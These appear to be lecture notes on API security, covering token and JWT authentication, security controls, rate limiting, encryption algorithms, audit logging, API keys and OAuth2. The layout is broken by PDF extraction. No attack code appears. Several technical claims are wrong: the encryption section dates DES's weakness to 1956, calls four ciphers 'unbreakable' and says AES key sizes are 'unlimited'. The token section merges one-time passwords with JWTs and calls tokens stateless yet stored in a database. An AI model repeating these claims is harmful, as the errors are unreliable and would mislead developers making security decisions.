related to API security and session management.

By following these best practices, you can enhance the security of session cookies in your API,
reducing the risk of various common web application vulnerabilities.
Token Based Authentication
Digital transformation brings security concerns for users to protect their identity from
bogus eyes. According to US Norton, on average 8 lakh accounts are being hacked every
year. There is a demand for high-security systems and cybersecurity regulations for
authentication.
Traditional methods rely on single-level authentication with username and password to
grant access to the web resources. Users tend to keep easy passwords or reuse the same
password on multiple platforms for their convenience. The fact is, there is always a wrong
eye on your web activities to take unfair advantage in the future.
Due to the rising security load, two-factor authentication (2FA) come into the picture and
introduced Token-based authentication. This process reduces the reliance on password
systems and added a second layer to security. Let’s straight jump on to the mechanism.
But first of all, let’s meet the main driver of the process: a T-O-K-E-N !!!
What is an Authentication Token?
A Token is a computer-generated code that acts as a digitally encoded signature of a user.
They are used to authenticate the identity of a user to access any website or application
network.
A token is classified into two types: A Physical token and a Web token. Let’s
understand them and how they play an important role in security.
 Physical token: A Physical token use a tangible device to store the information of
a user. Here, the secret key is a physical device that can be used to prove the
user’s identity. Two elements of physical tokens are hard tokens and soft tokens.
Hard tokens use smart cards and USB to grant access to the restricted network
like the one used in corporate offices to access the employees. Soft tokens use
mobile or computer to send the encrypted code (like OTP) via authorized app or
SMS.
 Web token: The authentication via web token is a fully digital process. Here, the
server and the client interface interact upon the user’s request. The client sends
the user credentials to the server and the server verifies them, generates the
digital signature, and sends it

DEPARTMENT OF AI&DS Page 3


back to the client. Web tokens are popularly known as JSON Web Token
(JWT), a standard for creating digitally signed tokens.
A token is a popular word used in today’s digital climate. It is based on decentralized
cryptography. Some other token-associated terms are Defi tokens, governance tokens, Non
Fungible tokens, and security tokens. Tokens are purely based on encryption which is
difficult to hack.
What is a Token-based Authentication?
Token-based authentication is a two-step authentication strategy to enhance the security
mechanism for users to access a network. The users once register their credentials, receive
a unique encrypted token that is valid for a specified session time. During this session,
users can directly access the website or application without login requirements. It enhances
the user experience by saving time and security by adding a layer to the password system.
A token is stateless as it does not save information about the user in the database. This
system is based on cryptography where once the session is complete the token gets
destroyed. So, it gets the advantage against hackers to access resources using passwords.
The most friendly example of the token is OTP (One Time password) which is used to verify
the identity of the right user to get network entry and is valid for 30-60 seconds. During the
session time, the token gets stored in the organization’s database and vanishes when the
session expired.
Let’s understand some important drivers of token-based authentication-
 User: A person who intends to access the network carrying his/her username
& password.
 Client-server: A client is a front-end login interface where the user first
interacts to enroll for the restricted resource.
 Authorization server: A backend unit handling the task of verifying the
credentials, generating tokens, and send to the user.
 Resource server: It is the entry point where the user enters the access token. If
verified, the network greets users with a welcome note.
How does Token-based Authentication work?
Token-based authentication has become a widely used security mechanism used by internet
service providers to offer a quick experience to users while not compromising the security
of their data. Let’s understand how this mechanism works with 4 steps that are easy to
grasp.

DEPARTMENT OF AI&DS Page 4


How Token-based Authentication works?

1. Request: The user intends to enter the service with login credentials on the application or
the website interface. The credentials involve a username, password, smartcard, or
biometrics
2. Verification: The login information from the client-server is sent to the authentication
server for verification of valid users trying to enter the restricted resource. If the credentials
pass the verification the server generates a secret digital key to the user via HTTP in the form
of a code. The token is sent in a JWT open standard format which includes-
 Header: It specifies the type of token and the signing algorithm.
 Payload: It contains information about the user and other data
 Signature: It verifies the authenticity of the user and the messages transmitted.
3. Token validation: The user receives the token code and enters it into the resource server to
grant access to the network. The access token has a validity of 30-60 seconds and if the user
fails to apply it can request the Refresh token from the authentication server. There’s a limit
on the number of attempts a user can make to get access. This prevents brute force attacks
that are based on trial and error methods.
4. Storage: Once the resource server validated the token and grants access to the user, it
stores the token in a database for the session time you define. The session time is different
for every website or app. For example, Bank applications have the shortest session time of
about a few minutes only.
So, here are the steps that clearly explain how token-based authentication works and what
are the main drivers driving the whole security process.
Note: Today, with growing innovations the security regulations are going to be strict to
ensure that only the right people have access to their resources. So, tokens are occupying
more space in the security process due to their ability to tackle the store information in the
encrypted form and work on both website and application to maintain and scale the user
experience. Hope the article gave you all the know-how of token-based authentication and
how it helps in ensuring the crucial data is being misused.
Securing Natter APIs:

DEPARTMENT OF AI&DS Page 5


1. Authentication:

Token-Based Authentication:
 Use token-based authentication mechanisms like JWT or OAuth for secure
user
authentication. This ensures that only authorized users can access your APIs.
 API
Keys:
 If applicable, use API keys for access control. Keep these keys secure and
avoid
exposing them in client-side code.

2. Authorization:

 Role-Based Access Control


(RBAC):
 Implement RBAC to control what actions users or systems can perform within
the
API. Assign specific roles and permissions to users.
 Scope Management:
 If using OAuth, manage and validate scopes to restrict access to specific
resources or actions.

3. Secure Communication:

 HTTP
S:
 Always use HTTPS to encrypt data in transit. This prevents eavesdropping and
man-in-the-middle attacks.
 TLS/SS
L:
 Keep your TLS/SSL certificates up to date. Use strong cipher suites and
protocols.

4. Input Validation:

 Sanitize Inputs:
 Validate and sanitize all inputs to prevent injection attacks. This is crucial to
protect against SQL injection, XSS, and other common vulnerabilities.

5. Rate Limiting:

 Implement Rate Limiting:


 Protect your API from abuse by implementing rate limiting. This prevents
attackers from overwhelming your system with too many requests.

DEPARTMENT OF AI&DS Page 6


6. Logging and Monitoring:

 Log API
Activities:
 Implement logging for all API activities. This aids in auditing, debugging, and
identifying potential security incidents.
 Monitoring and Alerts:
 Set up monitoring to detect unusual patterns or suspicious activities. Configure
alerts to notify administrators of potential security threats.
7. Error Handling:

 Custom Error Messages:


 Provide generic error messages to clients to avoid exposing sensitive
information.
Log detailed errors on the server side for internal debugging.

8. Data Protection:

 Encryption:
 Encrypt sensitive data at rest. If your API deals with sensitive information,
ensure
that it is stored securely.
 Data Masking:
 Implement data masking techniques to hide parts of sensitive information in
responses.

9. API Versioning:

 Versioning:
 Implement versioning to ensure that changes to your API don’t break existing
clients. This allows for a smoother transition when introducing new features or
security enhancements.

10. Security Headers:

 HTTP Security
Headers:
 Utilize security headers like Content Security Policy (CSP), Strict-Transport-
Security (HSTS), and others to enhance the security of your API.

11. Security Testing:

 Regular Security Audits:


 Conduct regular security audits and penetration testing to identify and
remediate
vulnerabilities.

DEPARTMENT OF AI&DS Page 7


 Static and Dynamic
Analysis:
 Use tools for static and dynamic code analysis to identify potential security
issues
in your codebase.

12. Education and Training:

 Developer Training:
 Train developers on secure coding practices and keep them informed about the
latest security threats and best practices.

By incorporating these best practices, you can significantly enhance the security of your Natter
APIs or any other APIs in your application ecosystem. Remember that security is an ongoing
process, and it's essential to stay vigilant and proactive in addressing emerging threats.

DEPARTMENT OF AI&DS Page 8


Addressing threats with Security Controls

1. Threat: Unauthorized Access

Security Controls:

Authentication:
 Implement strong authentication mechanisms such as multi-factor
authentication
(MFA) to verify the identity of users.
 Access
Control:
 Use role-based access control (RBAC) to ensure that users have the minimum
necessary permissions for their roles.
 Account Lockout
Policies:
 Implement account lockout policies to prevent brute-force attacks.

2. Threat: Data Breach

Security Controls:

 Encryption:
 Encrypt sensitive data at rest and in transit to protect it from unauthorized
access.
 Data Loss Prevention
(DLP):
 Implement DLP solutions to monitor and prevent the unauthorized transfer of
sensitive information.
 Regular Audits:
 Conduct regular audits and vulnerability assessments to identify and remediate
security weaknesses.

3. Threat: Malware and Ransomware

Security Controls:

 Antivirus Software:
 Use reputable antivirus software to detect and remove malware.
 User Education:
 Educate users about the risks of downloading or clicking on suspicious links,
reducing the likelihood of malware infections.
 Regular Software Updates:
 Keep all software and systems up to date with the latest security patches to
address vulnerabilities.

4. Threat: Insider Threats

Security Controls:

DEPARTMENT OF AI&DS Page 9


 User
Training:
 Train employees on security policies and the potential risks associated with
insider threats.
 Monitoring and Auditing:
 Implement user activity monitoring and conduct regular audits to detect and
respond to suspicious behavior.
 Least Privilege Principle:
 Follow the principle of least privilege to ensure that users have only the necessary
permissions for their roles.

5. Threat: DDoS Attacks

Security Controls:

 Traffic
Filtering:
 Use traffic filtering solutions to detect and mitigate DDoS attacks.
 Content Delivery Networks
(CDNs):
 Employ CDNs to distribute traffic and absorb DDoS attacks.
 Incident Response Plan:
 Develop and regularly test an incident response plan to quickly respond to and
mitigate the impact of DDoS attacks.

6. Threat: SQL Injection

Security Controls:

 Input Validation:
 Implement thorough input validation to prevent SQL injection attacks.
 Parameterized Queries:
 Use parameterized queries or prepared statements to interact with databases
securely.
 Web Application Firewalls
(WAF):
 Deploy WAFs to monitor and filter HTTP traffic between a web application
and
the Internet.

DEPARTMENT OF AI&DS Page 10


7. Threat: Phishing Attacks

Security Controls:

 Email
Filtering:
 Use email filtering solutions to detect and block phishing emails.
 User
Training:
 Conduct regular training sessions to educate users about recognizing and
avoiding phishing attempts.
 Multi-Factor Authentication (MFA):
 Implement MFA to add an additional layer of security, even if credentials are
compromised.
8. Threat: Lack of Security Updates

Security Controls:

 Patch Management:
 Establish a robust patch management process to ensure timely application of
security updates.
 Vulnerability Scanning:
 Regularly scan systems for vulnerabilities and prioritize patching based on
criticality.
 System Monitoring:
 Implement continuous monitoring to quickly identify and address
vulnerabilities.

9. Threat: Social Engineering Attacks

Security Controls:

 User Education:
 Train users to be cautious about sharing sensitive information and to verify the
legitimacy of requests.
 Strict Access
Controls:
 Implement strict access controls to limit access to sensitive information.
 Incident Response Plan:

DEPARTMENT OF AI&DS Page 11


 Have an incident response plan in place to handle social engineering incidents
promptly.

10. Threat: Physical Security Risks

Security Controls:

 Access
Controls:
 Implement access controls for physical premises, restricting entry to authorized
personnel.
 Surveillance Systems:
 Use surveillance systems to monitor and record activities in critical physical
locations.
 Visitor
Logs:
 Maintain visitor logs to track individuals entering and leaving secure areas.

Implementing a comprehensive security strategy that combines these controls helps


organizations build a robust defense against a variety of threats. Regular testing, monitoring, and
updating security practices are essential for maintaining a strong security posture over time.

Rate Limiting for Availability


Rate limiting is a crucial mechanism for maintaining availability and preventing abuse or
malicious attacks on your systems. By

DEPARTMENT OF AI&DS Page 12


restricting the rate at which certain actions or requests can be performed, rate limiting helps
protect your resources, ensure fair usage, and mitigate the risk of denial-of-service (DoS)
attacks. Here are some considerations and best practices for implementing rate limiting for
availability:

### 1. **Define Sensible Limits:**


- Set appropriate rate limits based on the nature of your application and the expected
usage patterns. Striking a balance between preventing abuse and allowing legitimate users to
access your resources is essential.

### 2. **Differentiate Between Types of Requests:**


- Categorize and prioritize different types of requests. For example, critical API
endpoints might have lower rate limits than less critical ones.

### 3. **Implement Burst Limits:**


- Consider implementing burst limits to allow short bursts of higher activity, but still
enforcing overall rate limits over longer periods.

### 4. **Dynamic Rate Limiting:**


- Implement dynamic rate limiting that adjusts based on the current load or usage
patterns. This can help adapt to changing circumstances and prevent sudden spikes in traffic
from causing disruptions.

### 5. **User Authentication and Rate Limits:**


- Tie rate limiting to user authentication. Authenticated users might have higher limits
than unauthenticated users. This helps to identify and control abusive behavior by specific
users.

### 6. **Provide Clear Error Messages:**


- When a user exceeds the rate limit, provide clear and informative error
messages. This helps legitimate users

DEPARTMENT OF AI&DS Page 13


understand why their request was denied and what actions they can take.

### 7. **Include Rate Limiting in SLAs:**


- Clearly define rate limits in your service level agreements (SLAs) and terms of service.
This sets expectations for users and helps you enforce limits as part of your contractual
agreement.

### 8. **Monitor and Analyze Traffic:**


- Implement monitoring tools to track and analyze traffic patterns. This helps you
identify potential abuse or anomalies that may require adjustments to your rate limiting
strategy.

### 9. **Distributed Rate Limiting:**


- If your application is distributed, implement rate limiting mechanisms across all
components to ensure consistent enforcement and avoid vulnerabilities in specific parts
of your infrastructure.

### 10. **Consider Geographical Factors:**


- Depending on your application, you might need to consider geographical factors.
Implement rate limiting based on the geographic location of users to account for regional
variations in usage patterns.

### 11. **Graceful Degradation:**


- Implement mechanisms for graceful degradation during periods of high traffic or when
rate limits are reached. Provide a user-friendly experience and prioritize essential
functionalities.

### 12. **Regularly Review and Adjust:**


- Periodically review your rate limiting strategy. Adjust rate limits based on evolving
usage patterns, changes in your application, or emerging security threats.

### 13. **Failover and Redundancy:**

DEPARTMENT OF AI&DS Page 14


- Ensure that your rate limiting mechanisms are part of your overall availability strategy.
Implement failover mechanisms and redundancy to maintain service availability even if
certain components experience issues.

### 14. **Communicate Changes:**


- If you need to adjust rate limits, communicate these changes proactively to your user
base. Transparency helps in managing user expectations and reducing frustration.

By implementing these best practices, you can leverage rate limiting to enhance the
availability of your services and protect your infrastructure from potential abuse or attacks.
Encryption
Encryption in cryptography is a process by which a plain text or a piece of information is
converted into cipher text or a text which can only be decoded by the receiver for whom the
information was intended. The algorithm that is used for the process of encryption is known
as cipher. It helps in protecting consumer information, emails and other sensitive data from
unauthorized access to it as well as secures communication networks. Presently there are
many options to choose and find out the most secure algorithm which meets our
requirements. There are four such encryption algorithms that are highly secured and are
unbreakable.
o Triple DES: Triple DES is a block cipher algorithm that was created to replace its
older version Data Encryption Standard(DES). In 1956 it was found out that 56
key-bit of DES was not enough to prevent brute force attack, so Triple DES was
discovered with the purpose of enlarging the key space without any requirement
to change algorithm. It has a key length of 168 bits three 56-bit DES keys but
due to meet-in-middle-attack the effective security is only provided for only 112
bits. However Triple DES suffers from slow performance in software. Triple
DES is well suited for hardware implementation. But presently Triple DES is
largely replaced by AES (Advance Encryption Standard).

o RSA :
RSA is an asymmetric key algorithm which is named after its creators Rivest,
Shamir and Adleman. The algorithm is based on the fact that the factors of large
composite number is difficult: when the integers are prime, this method is
known as Prime Factorization. It is

DEPARTMENT OF AI&DS Page 15


generator of public key and private key. Using public key we convert plain text
to cipher text and private key is used for converting cipher text to plain text.
Public key is accessible by everyone whereas Private Key is kept secret. Public
Key and Private Key are kept different.Thus making it more secure algorithm for
data security.
o Twofish:
Twofish algorithm is successor of blowfish algorithm. It was designed by Bruce
Schneier, John Kesley, Dough Whiting, David Wagner, Chris Hall and Niels
Ferguson. It uses block ciphering It uses a single key of length 256 bits and is
said to be efficient both for software that runs in smaller processors such as those
in smart cards and for embedding in hardware .It allows implementers to trade
off encryption speed, key setup time, and code size to balance performance.
Designed by Bruce Schneier’s Counterpane Systems, Twofish is unpatented,
license-free, and freely available for use.
o AES:
Advance Encryption Standard also abbreviated as AES, is a symmetric block
cipher which is chosen by United States government to protect significant
information and is used to encrypt sensitive data of hardware and software.
AES has three
128-bit fixed block ciphers of keys having sizes 128, 192 and 256 bits. Key sizes
are unlimited but block size is maximum 256 bits.The AES design is based on a
substitution-permutation network (SPN) and does not use the Data Encryption
Standard (DES) Feistel network.
Future Work:
With advancement in technology it becomes more easier to encrypt data, with neural
networks it becomes easier to keep data safe. Neural Networks of Google Brain have
worked out to create encryption, without teaching specifics of encryption algorithm. Data
Scientist and Cryptographers are finding out ways to prevent brute force attack on
encryption algorithms to avoid any unauthorized access to sensitive data.
Encryption is a fundamental technique in cybersecurity used to secure sensitive
information by converting it into a format that is unintelligible without the appropriate key
to decrypt it. Here are some key aspects of encryption:

### Types of Encryption:

1. **Symmetric Encryption:**
- Uses a single key for both encryption and decryption.

DEPARTMENT OF AI&DS Page 16


- Fast and efficient but requires a secure way to share the key.

2. **Asymmetric Encryption (Public-Key Cryptography):**


- Uses a pair of public and private keys.
- Public key is used for encryption, and the private key is used for decryption.
- Eliminates the need for a secure key exchange but can be slower than symmetric
encryption.

### Common Encryption Algorithms:

1. **AES (Advanced Encryption Standard):**


- Widely used symmetric encryption algorithm.
- Provides strong security and efficiency.

2. **RSA (Rivest-Shamir-Adleman):**
- Common asymmetric encryption algorithm.
- Key pair includes a public key for encryption and a private key for decryption.

3. **DSA (Digital Signature Algorithm):**


- Used for digital signatures, a form of asymmetric cryptography.

4. **ECC (Elliptic Curve Cryptography):**


- Provides strong security with shorter key lengths compared to traditional algorithms.

### Use Cases for Encryption:

1. **Data in Transit:**
- Encrypts data as it travels over networks (e.g., HTTPS for secure web
communication).

2. **Data at Rest:**
- Encrypts stored data on devices or servers to prevent unauthorized access.

3. **End-to-End Encryption:**
- Ensures that data is encrypted from the sender to the recipient, preventing
intermediaries from accessing the content.

4. **File and Disk Encryption:**


- Encrypts entire files or disks to protect against unauthorized access.

DEPARTMENT OF AI&DS Page 17


5. **Email Encryption:**
- Secures the content of emails to maintain confidentiality. ### Best
Practices for Encryption:

1. **Key Management:**
- Implement secure key management practices to protect encryption keys.

2. **Regularly Update Algorithms:**


- Stay informed about the latest encryption algorithms and update as needed to maintain
security.

3. **Use Strong Passwords/Keys:**


- Employ long and complex passwords or keys to enhance security.

4. **Secure Transmission of Keys:**


- If using symmetric encryption, ensure a secure method for key exchange.

5. **Implement Perfect Forward Secrecy:**


- Ensure that compromise of a long-term key does not compromise past sessions.

6. **Consider Hardware Security Modules (HSMs):**


- Use HSMs to provide extra protection for cryptographic keys.

7. **Encrypt Sensitive Metadata:**


- Consider encrypting not only the data but also any sensitive metadata associated
with it.

8. **Understand Compliance Requirements:**


- Be aware of and adhere to relevant compliance requirements regarding data encryption.

9. **Regular Audits and Monitoring:**


- Conduct regular audits to ensure encryption implementation is secure.
Monitor for any suspicious activities.

10. **Combine Encryption with Other Security Measures:**


- Use encryption as part of a comprehensive security strategy that includes access
controls, authentication, and monitoring.

11. **Keep Software and Systems Updated:**


- Regularly update encryption software and systems to patch vulnerabilities.

DEPARTMENT OF AI&DS Page 18


Encryption is a critical component in safeguarding sensitive information and maintaining the
confidentiality and integrity of data in various digital environments. Organizations must
carefully implement and manage encryption to ensure its effectiveness in protecting against
potential threats.
Audit logging
Audit logging, also known as security logging or event logging, is a crucial
component of an organization's cybersecurity strategy. It involves the systematic
recording of events and activities within an information system, network, or
application. The primary purpose of audit logging is to provide a detailed record of
security-relevant events, enabling organizations to monitor, analyze, and respond to
potential security incidents. Here are key aspects of audit logging:

Objectives of Audit Logging:

1. Detection of Anomalies:
 Identify unusual or suspicious activities that may indicate security
threats.
2. Incident Investigation:
 Provide a detailed trail of events for forensic analysis in the event of a
security incident.
3. Compliance and Accountability:
 Demonstrate compliance with regulatory requirements by maintaining
records of access and changes.
4. User Activity Monitoring:
 Monitor and log user activities to ensure adherence to security policies
and detect unauthorized actions.
5. Alerting and Notification:
 Generate alerts and notifications based on predefined criteria to
facilitate rapid response to security events.

Components of Audit Logging:

1. Event Sources:
 Identify and define the sources of events to be logged, such as
operating systems, applications, databases, and network devices.
2. Event Types:
 Categorize events into types, including login attempts, file access,
configuration changes, and other security-relevant actions.
3. Logging Format:
 Define a standardized format for log entries, including timestamp,
event type, user ID, IP address, and other relevant details.

DEPARTMENT OF AI&DS Page 19


4. Log Retention Policy:
 Establish a policy for the retention of logs, considering legal and
compliance requirements.
5. Access Controls:
 Implement access controls to ensure that only authorized personnel can
view or modify log files.
6. Encryption:
 Consider encrypting log files to protect sensitive information contained within
them.

Best Practices for Audit Logging:

1. Include Relevant Information:


 Log information that is pertinent to security, such as user logins, failed
login attempts, privilege escalations, and critical system changes.
2. Timestamp Accuracy:
 Ensure accurate and synchronized timestamps in log entries to facilitate
correlation and analysis.
3. Centralized Logging:
 Implement centralized logging to aggregate logs from multiple
sources, aiding in comprehensive analysis.
4. Regular Monitoring:
 Regularly monitor and review logs to detect and respond to security
events promptly.
5. Alerting Mechanisms:
 Implement alerting mechanisms to notify security personnel of
suspicious or critical events in real-time.
6. Regular Audits:
 Conduct periodic audits of log files to verify the integrity and
completeness of the recorded events.
7. User Education:
 Educate users on the importance of audit logging and the potential
consequences of improper activities.
8. Protection Against Tampering:
 Implement measures to protect logs from tampering or unauthorized
deletion.
9. Automated Log Analysis:
 Employ automated log analysis tools to identify patterns or anomalies
that may not be immediately apparent.
10. Regularly Update Logging Configuration:

DEPARTMENT OF AI&DS Page 20


Review and update logging configurations as systems and applications
evolve.
11. Documentation:
 Document the logging process, including the types of events recorded
and the retention policy.

Audit logging is an integral part of a comprehensive cybersecurity strategy, providing


organizations with valuable insights into their security postures and aiding in the
identification and response to security incidents.

, Securing service-to-service APIs:


This Chapter Covers
 Authenticating services with API keys and JWTs
 Using OAuth2 for authorizing service-to-service API calls
 TLS client certificate authentication and mutual TLS
 Credential and key management for services
 Making service calls in response to user requests
In previous chapters, authentication has been used to determine which user is accessing an
API and what they can do. It’s increasingly common for services to talk to other services
without a user being involved at all. These service-to-service API calls can occur within a
single organization, such as between microservices, or between organizations when an API is
exposed to allow other businesses to access data or services. For example, an online retailer
might provide an API for resellers to search products and place orders on behalf of
customers. In both cases, it is the API client that needs to be authenticated rather than an end
user. Sometimes this is needed for billing or to apply limits according to a service contract,
but it’s also essential for security when sensitive data or operations may be performed.
Services are often granted wider access than individual users, so stronger protections may be
required because the damage from compromise of a service account can be greater than any
individual user account. In this chapter, you’ll learn how to authenticate services and
additional hardening that can be applied to better protect privileged accounts, using advanced
features of OAuth2.
Note
The examples in this chapter require a running Kubernetes installation configured according
to the instructions in appendix B.

Securing service-to-service APIs involves implementing measures to protect the


communication and data exchange between different components or services within a system.
This is crucial to ensure the confidentiality, integrity, and availability of the information being
transmitted. Here's a brief explanation and definition:

Definition: Securing service-to-service APIs refers to the implementation of security


measures to
safeguard the interaction and data transfer between different services in a software
architecture. This process aims to prevent unauthorized access, data breaches, and ensure the
overall integrity and reliability of the system.

Brief Explanation: In modern software development, systems are often composed of multiple

DEPARTMENT OF AI&DS Page 21


services that need to communicate with each other through APIs (Application Programming
Interfaces). Securing these APIs is essential to protect sensitive data and maintain the
trustworthiness of the entire system.

DEPARTMENT OF AI&DS Page 22


Security measures may include implementing encryption (e.g., HTTPS) to protect data in transit,
authentication mechanisms to ensure that only authorized services can communicate,
authorization controls to manage access to specific resources, and various other practices to
mitigate potential vulnerabilities.

Securing service-to-service APIs is a critical aspect of overall system security, especially in


distributed architectures like microservices. It involves a combination of encryption,
authentication, access controls, and monitoring to create a robust defense against potential
threats and attacks, ensuring that the interconnected services can operate securely and trust each
other in a controlled manner.
API Keys

API keys are a common form of authentication used in web and software development to control
access to web services, APIs (Application Programming Interfaces), or other types of resources.
An API key is essentially a code passed in by computer programs calling an API to identify the
calling program and ensure that it has the right to access the requested resources.

Here's a more detailed explanation:

Definition: An API key is a unique identifier, often a long string of alphanumeric characters, that
is issued to developers or applications accessing an API. It serves as a form of token-based
authentication, allowing the API provider to identify and authorize the source of incoming
requests. API keys are commonly used in both public and private APIs to control access and
monitor usage.

How API Keys Work:

1. Issuance: The API provider generates and issues a unique API key to developers or
applications that need to access the API.
2. Inclusion in Requests: Developers include the API key in the headers or parameters of
their API requests. This key serves as a credential, allowing the API provider to identify the
source of the request.
3. Authentication: When an API request is received, the API provider checks the included
API key to verify its authenticity. If the key is valid and authorized for the requested
resource, the API provider processes the request; otherwise, it denies access.

Key Characteristics and Best Practices:

 Uniqueness: Each API key is unique to a specific application or developer, preventing


unauthorized access.
 Security: API keys should be treated as sensitive information. Transmit them over secure
channels (e.g., HTTPS) to prevent interception.
 Rotation: Regularly rotate or regenerate API keys to enhance security and limit the
impact of compromised keys.
 Usage Limits: Set usage limits on API keys to prevent abuse and control access to
resources.
 Scope: Some API keys may be tied to specific scopes or permissions, allowing fine-
grained control over the actions a key can perform.

DEPARTMENT OF AI&DS Page 23


DEPARTMENT OF AI&DS Page 24
 Revocation: In case of security concerns or when access is no longer needed, API
keys
should be revocable.

API keys are a convenient and widely used method for authenticating API requests. However,
they might not be suitable for all scenarios, especially when higher security measures like OAuth
or JWT (JSON Web Tokens) are required for more complex authentication and authorization
requirements.

While API keys generally serve as simple authentication tokens, there are different types of API
keys, each with its own characteristics and use cases. The specific types may vary based on the
API provider and the security requirements of the system. Here are some common types:

1. Application-Specific API
Keys:
Description: Each application or developer is assigned a unique API key.
Use Suitable for scenarios where access control is needed at the
Case: application
level.
2. User-Specific API
Keys:
Description: Each user is assigned a unique API key.
Use Often used in applications where individual user accounts need to
Case:
access specific resources or perform actions.
3. Temporary API
Keys:
Description: API keys with a limited validity period.
Use Useful for scenarios where temporary access is needed, and
Case: regularly
rotating keys enhances security.
4. Admin or Master API
Keys:
Description: A single API key with broad access privileges.
Use Typically used by administrators or trusted entities to perform
Case:
operations that require extensive permissions.
5. Scoped API:
Keys
Description: API keys with limited access to specific functionalities or
resources.
Use Suitable for situations where fine-grained access control is essential.
Case:
6. Environment-Specific API
Keys:
Description: Different API keys for different environments (e.g., development,
testing, production).
 Use Case: Helps manage access and monitor usage in different stages of
the development lifecycle.

DEPARTMENT OF AI&DS Page 25


7. IP-Restricted API
Keys:
 Description: API keys that are restricted to specific IP addresses.
 Use Enhances security by limiting API access to requests originating
Case: from
predefined IP addresses.
8. Referer-Specific API
Keys:
 Description: API keys restricted based on the referring domain or URL.
 Use Useful for limiting access to specific websites or applications.
Case:
9. Resource-Specific API:
Keys
 Description: Keys tied to specific resources or endpoints within an API.
 Use Provides a way to control access at a granular level, allowing
Case: different
keys for different parts of the API.
10. JWT (JSON Web Token) API
Keys:
 Description: API keys that are implemented using the JWT standard.
 Use Combines authentication and information about the user or
Case:
application in a secure token format.

These types of API keys can be used individually or in combination, depending on the complexity
of the system, security requirements, and the level of control needed over API access. It's
important for developers and API providers to choose the appropriate type of API key based on
the specific use case and security considerations.

Advantages:

1. Simplicity:
Advantage: API keys are easy to implement and use, making them a
straightforward method of authentication.
2. Quick Integration:
Advantage: Developers can quickly integrate API keys into their
applications, reducing the time required for setup.
3. Scalability:
Advantage: API keys are scalable, making them suitable for a large
number of clients or applications.
4. Resource Control:
Advantage: API keys can be scoped or limited to specific
functionalities, providing control over the resources a client can access.
5. Ease of Revocation:
Advantage: Revoking access is simple. If a key is compromised or no
longer needed, it can be disabled.

DEPARTMENT OF AI&DS Page 26


6. Logging and Monitoring:
Advantage: API keys allow for easy tracking and monitoring of usage
patterns, helping in identifying and addressing potential issues.

Disadvantages:

1. Security Risks:
 Disadvantage: API keys can be susceptible to security risks if not
handled properly. If exposed or leaked, they could be misused.
2. Limited Authentication:
 Disadvantage: API keys provide a basic form of authentication and
may not be suitable for scenarios requiring more advanced identity
verification.
3. Difficulty in Key Management:
 Disadvantage: Managing a large number of API keys can become
challenging. Regularly rotating keys and maintaining security can be
complex.

DEPARTMENT OF AI&DS Page 27


4. Lack of User Context:
Disadvantage: API keys do not inherently carry information about the
user making the request, making it challenging to implement user-
specific functionalities.
5. No Standardization:
Disadvantage: There's no standardized way of implementing API keys.
Practices can vary between providers, leading to inconsistencies.
6. Limited Flexibility:
Disadvantage: API keys might not provide the flexibility needed for
more complex authorization scenarios or workflows.
7. Overhead in Key Distribution:
Disadvantage: Distributing API keys securely to developers or users
can introduce overhead and potential vulnerabilities.
8. Lack of Token Expiry Management:
Disadvantage: Some API key systems may lack built-in mechanisms for
token expiry management, leading to potential security risks.

Considerations:

1. Use Case and Security Requirements:


 Carefully consider the specific use case and security requirements
before choosing API keys as an authentication method.
2. Combined Approaches:
 In some scenarios, combining API keys with additional authentication
methods (e.g., OAuth, JWT) may provide a more robust solution.
3. Regular Key Rotation:
 Implement regular key rotation practices to enhance security.
4. Secure Transmission:
 Always transmit API keys over secure channels (e.g., HTTPS) to prevent
interception.
5. Logging and Monitoring:
 Implement comprehensive logging and monitoring to detect and
respond to suspicious activities related to API keys.
OAuth2
OAuth2.0 is an Open industry-standard authorization protocol that allows a third party to
gain limited access to another HTTP service, such as Google, Facebook, and GitHub, on
behalf of a user, once the user grants permission to access their credentials.
Most websites require you to complete a registration process before you can access their
content. It is likely that you have come across some buttons for logging in with Google,
Facebook, or another service.
Let us now discuss OAuth.

DEPARTMENT OF AI&DS Page 28


OAuth is an open-standard authorization framework that enables third-party applications to
gain limited access to user’s data.
Essentially, OAuth is about delegated access.
Delegation is a process in which an owner authorizes a service provider to perform certain
tasks on the owner’s behalf. Here the task is to provide limited access to another party.
Let’s take two real-life examples;
House owners often approach real estate agents to sell their house. The house owner
authorizes the real estate agent by giving him/her the key. Upon the owner’s consent, the
agents show the buyers the property. The buyer is welcome to view the property, but they
are not permitted to occupy it. In this scenario, the buyer has limited access, and the access
is limited by the real estate agent who is acting on the owner’s behalf.
A classic example of valet parking is often retold to understand this concept. In this case,
the car owner has access to both the car and the valet. To have his car parked for him, the
car owner gives the valet key to the attendant. The valet key starts the car and opens the
driver’s side door but prevents the valet from accessing valuables in the trunk or glove box.
Thus, the Valet key has delegated the task of limiting the access of the valet. What is the
point of OAuth?
OAuth allows granular access levels. Rather than entrusting our entire protected data to a
third party, we would prefer to share just the necessary data with them.
Thus, we need a trusted intermediary that would grant limited access(known as scope) to
the editor without revealing the user’s credentials once the user has granted
permission.(known as consent).
The editing software cannot request your Google account credentials; instead, it redirects
you to your account. If you choose to invite your friend through that app, the app will
request access to your Google address book to send the invitation.
 Read/write only -A third party can only read your data, not modify it. In some
instances, it can also request content modifications on your account. For
example, you can cross-post a picture from your Instagram account to your
Facebook account.
 Revoke Access –You can deauthorize Instagram’s access to your
Facebook wall so it can no longer post on your wall.
Before we get into how OAuth works, we’ll discuss the central components of OAuth for
more clarity.
The elements of OAuth are listed below:
1. Actors
2. Scopes and Consent
3. Tokens
4. Flows
Actors:
OAuth Interactions have the following Actors:

DEPARTMENT OF AI&DS Page 29


OAuth2.0 Actors

 Resources are protected data that require OAuth to access them.


 Resource Owner: Owns the data in the resource server. An entity capable of
granting access to protected data. For example, a user Google Drive account.
 Resource Server: The API which stores the data. For example, Google Photos
or Google Drive.
 Client: It is a third-party application that wants to access your data, for
example, a photo editor application.
There seems to be an interaction between two services for accessing resources, but the issue
is who is responsible for the security. The resource server, in this case, Google Drive, is
responsible for ensuring the required authentication.
OAuth is coupled with the Resource Server. Google implements OAuth to validate the
authorization of whoever accesses the resource.
 Authorization Server: OAuth’s main engine that creates access tokens.
Scope and Consent:
The scopes define the specific actions that apps can perform on behalf of the user. They are
the bundles of permissions asked for by the client when requesting a token.
For example, we can share our LinkedIn posts on Twitter via LinkedIn itself. Given that it
has write-only access, it cannot access other pieces of information, such as our
conversations.

DEPARTMENT OF AI&DS Page 30


On the Consent screen, a user learns who is attempting to access their data and what kind of
data they want to access, and the user must express their consent to allow third-party access
